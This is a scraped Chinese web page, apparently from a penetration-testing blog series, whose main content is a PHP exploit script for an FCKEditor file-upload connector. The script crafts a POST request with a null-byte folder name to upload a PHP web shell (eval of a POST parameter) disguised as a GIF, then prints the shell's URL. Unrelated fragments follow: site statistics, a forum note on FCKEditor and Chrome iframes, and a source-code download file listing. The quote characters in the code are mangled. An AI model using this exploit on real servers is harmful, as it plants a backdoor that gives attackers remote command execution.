9259人阅读
渗透测试技术研究（68）
error_reporting(0);
set_time_limit(0);
ini_set(&default_socket_timeout&, 5);
define(STDIN, fopen(&php://stdin&, &r&));
$match = array();
function http_send($host, $packet)
$sock = fsockopen($host, 80);
while (!$sock)
print &\n[-] No response from {$host}:80 Trying again...&;
$sock = fsockopen($host, 80);
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
function connector_response($html)
return (preg_match(&/OnUploadCompleted\((\d),\&(.*)\&\)/&, $html, $match) && in_array($match[1], array(0, 201)));
print &\n+------------------------------------------------------------------+&;
print &\n| FCKEditor Servelet Arbitrary File Upload Exploit |&;
print &\n+------------------------------------------------------------------+\n&;
if ($argc & 3)
print &\nUsage......: php $argv[0] host path\n&;
print &\nExample....: php $argv[0] localhost /\n&;
print &\nExample....: php $argv[0] localhost /FCKEditor/\n&;
$host = $argv[1];
$path = ereg_replace(&(/){2,}&, &/&, $argv[2]);
$filename = &fvck.gif&;
$foldername = &fuck.php%00.gif&;
$connector = &editor/filemanager/connectors/php/connector.php&;
$payload = &-----------------------------724\r\n&;
$payload .= &Content-Disposition: form- name=\&NewFile\&; filename=\&{$filename}\&\r\n&;
$payload .= &Content-Type: image/jpeg\r\n\r\n&;
$payload .= 'GIF89a'.&\r\n&.'&?php eval($_POST[cmd]) ?&'.&\n&;
$payload .= &-----------------------------724--\r\n&;
$packet = &POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=&.$foldername.& HTTP/1.0\r\n&;//print $
$packet .= &Host: {$host}\r\n&;
$packet .= &Content-Type: multipart/form- boundary=---------------------------724\r\n&;
$packet .= &Content-Length: &.strlen($payload).&\r\n&;
$packet .= &Connection: close\r\n\r\n&;
$packet .= $
if (!connector_response(http_send($host, $packet))) die(&\n[-] Upload failed!\n&);
else print &\n[-] Job done! try http://${host}/$match[2] \n&;
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：766763次
积分：7860
积分：7860
排名：第2770名
原创：93篇
转载：216篇
评论：53条
(1)(1)(2)(3)(3)(1)(7)(8)(1)(14)(4)(1)(6)(11)(1)(4)(10)(2)(1)(2)(17)(12)(30)(8)(21)(16)(62)(20)(29)(5)(6)
(window.slotbydup = window.slotbydup || []).push({
id: '4740881',
container: s,
size: '200,200',
display: 'inlay-fix'FCKEditor遇上Chrome33杯具,不能同时使用其他跨站iframe
可以断定，问题出在了IFRAME上了，即：在谷歌浏览器30版下，FCKEditor2.6.6编辑器加载完成之前，页面文档对象模型DOM结构中不能存在除编辑器之外的其它站外内容SRC跨域的IFRAME节点。
文章链接：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。本帖子已过去太久远了，不再提供回复功能。网站已改版，请使用新地址访问：
fckeditor-java-src fackwditHTM编辑器Macromedia Dreamweaver 8插件 Script 238万源代码下载-
&文件名称: fckeditor-java-src
& & & & &&]
&&所属分类:
&&开发工具: HTML
&&文件大小: 1404 KB
&&上传时间:
&&下载次数: 8
&&提 供 者:
&详细说明：fackwditHTM编辑器Macromedia Dreamweaver 8插件-fackwditHTM editor plug-dr
文件列表(点击判断是否您需要的文件，如果是垃圾请在下面评价投诉):
&&fckeditor-java-src\fckeditor-java-2.4\java-demo\src\main\webapp\fckeditor\editor\lang\_translationstatus.txt&&..................\..................\.........\...\....\......\.........\......\....\af.js&&..................\..................\.........\...\....\......\.........\......\....\ar.js&&..................\..................\.........\...\....\......\.........\......\....\bg.js&&..................\..................\.........\...\....\......\.........\......\....\bn.js&&..................\..................\.........\...\....\......\.........\......\....\bs.js&&..................\..................\.........\...\....\......\.........\......\....\ca.js&&..................\..................\.........\...\....\......\.........\......\....\cs.js&&..................\..................\.........\...\....\......\.........\......\....\da.js&&..................\..................\.........\...\....\......\.........\......\....\de.js&&..................\..................\.........\...\....\......\.........\......\....\el.js&&..................\..................\.........\...\....\......\.........\......\....\en-au.js&&..................\..................\.........\...\....\......\.........\......\....\en-ca.js&&..................\..................\.........\...\....\......\.........\......\....\en-uk.js&&..................\..................\.........\...\....\......\.........\......\....\en.js&&..................\..................\.........\...\....\......\.........\......\....\eo.js&&..................\..................\.........\...\....\......\.........\......\....\es.js&&..................\..................\.........\...\....\......\.........\......\....\et.js&&..................\..................\.........\...\....\......\.........\......\....\eu.js&&..................\..................\.........\...\....\......\.........\......\....\fa.js&&..................\..................\.........\...\....\......\.........\......\....\fi.js&&..................\..................\.........\...\....\......\.........\......\....\fo.js&&..................\..................\.........\...\....\......\.........\......\....\fr-ca.js&&..................\..................\.........\...\....\......\.........\......\....\fr.js&&..................\..................\.........\...\....\......\.........\......\....\gl.js&&..................\..................\.........\...\....\......\.........\......\....\gu.js&&..................\..................\.........\...\....\......\.........\......\....\he.js&&..................\..................\.........\...\....\......\.........\......\....\hi.js&&..................\..................\.........\...\....\......\.........\......\....\hr.js&&..................\..................\.........\...\....\......\.........\......\....\hu.js&&..................\..................\.........\...\....\......\.........\......\....\it.js&&..................\..................\.........\...\....\......\.........\......\....\ja.js&&..................\..................\.........\...\....\......\.........\......\....\km.js&&..................\..................\.........\...\....\......\.........\......\....\ko.js&&..................\..................\.........\...\....\......\.........\......\....\lt.js&&..................\..................\.........\...\....\......\.........\......\....\lv.js&&..................\..................\.........\...\....\......\.........\......\....\mn.js&&..................\..................\.........\...\....\......\.........\......\....\ms.js&&..................\..................\.........\...\....\......\.........\......\....\nb.js&&..................\..................\.........\...\....\......\.........\......\....\nl.js&&..................\..................\.........\...\....\......\.........\......\....\no.js&&..................\..................\.........\...\....\......\.........\......\....\pl.js&&..................\..................\.........\...\....\......\.........\......\....\pt-br.js&&..................\..................\.........\...\....\......\.........\......\....\pt.js&&..................\..................\.........\...\....\......\.........\......\....\ro.js&&..................\..................\.........\...\....\......\.........\......\....\ru.js&&..................\..................\.........\...\....\......\.........\......\....\sk.js&&..................\..................\.........\...\....\......\.........\......\....\sl.js&&..................\..................\.........\...\....\......\.........\......\....\sr-latn.js&&..................\..................\.........\...\....\......\.........\......\....\sr.js&&..................\..................\.........\...\....\......\.........\......\....\sv.js&&..................\..................\.........\...\....\......\.........\......\....\th.js&&..................\..................\.........\...\....\......\.........\......\....\tr.js&&..................\..................\.........\...\....\......\.........\......\....\uk.js&&..................\..................\.........\...\....\......\.........\......\....\vi.js&&..................\..................\.........\...\....\......\.........\......\....\zh-cn.js&&..................\..................\.........\...\....\......\.........\......\....\zh.js&&..................\..................\.........\...\....\......\.........\......\filemanager\connectors\py\htaccess.txt&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\config.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\connector.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\fckcommands.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\fckconnector.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\fckoutput.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\fckutil.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\upload.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\wsgi.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\..\zope.py&&..................\..................\.........\...\....\......\.........\......\...........\..........\test.html&&..................\..................\.........\...\....\......\.........\......\...........\..........\uploadtest.html&&..................\..................\.........\...\....\......\.........\......\...........\..........\aspx\config.ascx&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\connector.aspx&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\upload.aspx&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\basexml.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\class_upload.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\commands.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\config.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\connector.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\io.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\upload.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\util.asp&&..................\..................\.........\...\....\......\.........\......\...........\..........\cfm\image.cfc&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\ImageObject.cfc&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_basexml.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_commands.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_connector.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_io.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_upload.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf_util.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf5_connector.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\cf5_upload.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\config.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\connector.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\...\upload.cfm&&..................\..................\.........\...\....\......\.........\......\...........\..........\perl\connector.cgi&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\upload.cgi&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\basexml.pl&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\commands.pl&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\io.pl&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\upload_fck.pl&&..................\..................\.........\...\....\......\.........\......\...........\..........\....\util.pl
&输入关键字，在本站238万海量源码库中尽情搜索：